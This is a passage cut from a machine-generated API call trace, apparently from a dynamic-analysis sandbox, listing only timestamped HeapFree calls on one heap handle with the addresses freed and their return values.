lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0170.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0170.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0170.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0170.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0170.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0170.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0170.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0170.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0170.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0170.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4610f98 | out: hHeap=0x6a0000) returned 1 [0170.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0170.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4610f98 | out: hHeap=0x6a0000) returned 1 [0170.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0170.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0170.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0170.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0170.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0170.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0170.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0170.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4610f98 | out: hHeap=0x6a0000) returned 1 [0170.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0170.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4610f98 | out: hHeap=0x6a0000) returned 1 [0170.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0170.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0170.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4610f98 | out: hHeap=0x6a0000) returned 1 [0170.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4610f98 | out: hHeap=0x6a0000) returned 1 [0170.802] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0170.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0170.805] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0170.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0170.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0170.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0170.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0170.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0170.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0170.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0170.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0170.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0170.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0171.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0171.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0171.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0171.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0171.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0171.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0171.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0171.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45ef6f0 | out: hHeap=0x6a0000) returned 1 [0171.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0171.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0171.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0171.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0171.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0171.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0171.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0171.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0171.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0171.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0171.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0171.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0171.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0171.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0171.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0171.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0171.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0171.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0171.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0171.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0171.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0171.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0171.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0171.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0171.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0171.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0171.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.525] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.531] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.631] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0171.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0171.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0172.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0172.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0172.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0172.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0172.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455b7a8 | out: hHeap=0x6a0000) returned 1 [0172.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0172.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0172.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0172.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0172.818] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0172.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0172.823] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0172.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0172.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0172.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0172.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0172.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0172.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0172.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0172.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0172.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0172.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0172.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0172.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0172.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0172.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0172.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: 